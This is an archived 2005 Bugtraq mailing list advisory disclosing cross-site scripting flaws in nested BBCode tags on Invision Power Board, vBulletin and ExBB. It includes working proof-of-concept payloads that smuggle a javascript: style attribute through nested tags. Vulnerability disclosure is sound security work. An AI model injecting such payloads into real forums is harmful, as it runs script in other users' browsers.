XSS in the nested BB tag in many forum

To: <bugtraq@xxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxx>
Subject: XSS in the nested BB tag in many forum
From: "pigrelax" <pigrelax@xxxxxxxxx>
Date: Sat, 15 Jan 2005 16:13:38 +0300
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
Thread-index: AcT7BAa/E9A3a0HUSOilN2FKMNYTfQ==

XSS was found in the nested BB tag in many forum:

Invision Power Board:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`
style=background:url(javascript:alert()) [/COLOR]

vBulletin
[EMAIL=[URL=s as=`s@xxxxxx]mailto:assss@xxxxxx] 
sssssss[/URL][/EMAIL]` style=`background:url(javaSCrip
t:alert(/Hi_from_Algol/))` (using tab between "javaSCrip" and "t")

ExBB
[color='[url]http://rerer.rew[/url]]fffff[/color]'
style=background:url(javascript:alert()); 

Other forum and other BB tag may be vulnerable. Examples above work only in
Internet Explorer.

More info - http://www.securitylab.ru/51808.html and
antichat.ru/txt/IPB/index3.php

Prev by Date: iDefense iTunes advisory.
Next by Date: RE: Various Vulnerabilities in SparkleBlog
Previous by thread: iDefense iTunes advisory.
Next by thread: Apple Airport WDS DoS
Index(es):
- Date
- Thread